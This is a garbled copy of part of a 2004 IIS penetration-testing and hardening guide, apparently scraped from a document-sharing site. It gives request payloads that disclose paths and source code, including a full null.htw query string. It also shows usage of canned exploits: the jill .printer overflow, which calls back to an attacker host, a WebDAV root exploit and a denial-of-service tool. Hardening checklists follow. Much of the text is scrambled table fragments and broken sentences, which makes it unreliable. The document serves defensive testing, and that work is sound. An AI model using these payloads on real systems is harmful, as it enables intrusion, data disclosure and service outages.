Professional Documents
Culture Documents
A.1.1 Summary
Extentio
n
.asp
Requirement
ASP
Vulnerability
and HTTP
Reference
related Buffer Overflows:
functionality
GET Expected
Pre
Request
Response
requisite
200 OK
default.as
Search
www.Microsoft.com
.htr
.idc
To
MS02-018
reset Reveals source code
default.asp+.ht
Internet
www.Microsoft.com
Internet
MS01-04
Reveals directory path
/null.idc
Database
Search
Connector
www.Microsoft.com
500 error
.stm,
Server
.shtm,
Include
Q193689
Side Remote Buffer overflow
Search
.shtml
/<file>.stm,
200 OK
Requeste
.shtm, .shtml
www.Microsoft.com
.printer
Printing
MS01-044
from Remote Buffer overflow
Internet
file
must
be
present
/null.printer
Search
500 Internal
Server Error
www.Microsoft.com
.htw
Highlight
MS01-023
text Reveals source code
in web page
/null.htw
200 OK
Index
Search
"The
format Server
www.Microsoft.com
of
MS00-006
QUERY_ST
RING
.ida, .idq
Index Server
/null.ida,
invalid"
200 OK
Search
/null.idq
"The
www.Microsoft.com
file
MS01-033
not
is
Index
IDQ Server
could
be
FrontPa
FrontPage
/_vti_bin
found."
501
ge
Server
Search
/_vti_aut
Implemented
Server
Extention
www.Microsoft.com
/fp30reg.dll
Extentio
Not Front
Page
Server
MS01-035
Extention
2000
Visual
studio
RAD
Web
Remote
Web
DAV
DAV
attempting to
Remote
www.k-otik.com
Web
Server
DAV
www.microsoft.com/tech
DoSsed!
Remote
net/treeview/default.asp
DoS
B-eyee
Successful,
Exploit
is Method
search
be
is allowed.
Attack.
url=/technet/security/bull
after j00...
etin/MS03-018.asp
The exploit is available
at
www.k-otik.com
http://www.target.com/abc.idc
This results in full path and can be used to find out further holes.
C:\inetpub\wwwroot\abc.idc not found
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Pre Requsites:
IIS 5.0 without any service pack.
or anything.idq
you will get the path.
A.1.2.8
NULL.HTW
This vulnerability can give the souce code of server side ASP page. The ASP page could
give the valuable information like username and password.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none
%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction, CiHiliteType are the three variables of null.htw. Null.htw
takes input from user on these three varibales. In result you will get source code of
default.asp file.
Prerequsites:
1. Index Server
2. null.htw
A.1.2.9
WEBHITS.DLL
A.1.3 Bufferoverflow
A.1.3.1 WEBDAV REMOTE ROOT EXPLOIT
If IIS5.0 is unpatched, There is a lucky chance that a simple overflow will gain root to
attacker. The exploit written by Schizoprenic is available on www.k-otik.com . It's a
canned exploit again and if your exploits output gives you something like
Successful, attempting to join shell ...
That will means the server is vulnerable. Administrator's first priority shall be to apply
patch on the affected server.
A.1.3.3 JILL
jill is written in UNIX C, can also be compile with using Cygwin for Windows 2000.
$ gcc -o jill jill.c
This binary can be run either from the Cygwin shell or from a Win32 console if
cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>
A.1.4 DoS
As pointed out by SPI Dynamics, the vulnerability in IIS 5.0 and IIS 5.1 can lead to
Denial of Service. Worse part is it will be remote and causes the server to restart. The
proof of concept exploit is available at www.k-otik.com . It's a canned exploit so not use it
on your production server. The exploit work as below
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.
after path checking rather than before. In this unicode representation , it is possible to
use "../" to backup and into the sytem directory and feed the input to the command shell.
A.2 REFRENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html
Step
Consider the security of the environment.
Notes:
DMZ, Networking, border router,
networking, app server, database
server, etc.
Use checklist
software provider.
and
tools
from
Eg.Unused
IIS
ISAPI
DLLs
q
q
q
q
q
privileged.
Enable Only Essential Web Service Extensions.
Place Content on a Dedicated Disk Volume.
Without administrative utilities!!
Configure NTFS permissions.
Configure IIS Web Site permissions.
Configure IIS logging. Preferably, in W3C
format.
Configure
q
q
q
certificate server.
Install and configure a virus protection solution.
Install and configure IDS from HOST.
Secure well-known accounts.
appropriate
authentication
assign
complex
disabled.
Change
account description.
Execute the applications with protection of IIS 6.0
q
q
q
q
default
IIS 4.0/5.0
A.3.2 References
Hardening IIS 5.0
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/
depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5
chk.mspx
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 9 of 12
Harden web-server
o
Web-server hosts must be updated with the latest security fixes for the
operating system and web server software
Remove all non-essential files such as phf from the scripts directory /cgibin.
Remove all sample directories and pages that are shipped with web
servers
The damage that a successful attacker can inflict can be further limited by
running web server in a chroot-ed environment. The Unix chroot system
call changes the root directory of a process, such that the process can
then no longer access any of the files above the specified root directory in
the filesystem heirarchy. All web pages and configuration files need to be
in the chroot directory.
Run FTP server in a separate chrooted part of the directory tree that is
different from that of the web server
For Windows platform limit the top level root directory to an isolated
directory structure with strict permissions configured
other system processes. This will contain attacks and prevent damage
to web servers.
Mission critical web sites should have multiple servers on to which the
load is distributed. This will make it difficult to hog the performance of the
server, thereby reducing the chances for performance based denial of
service attacks. It also adds redundancy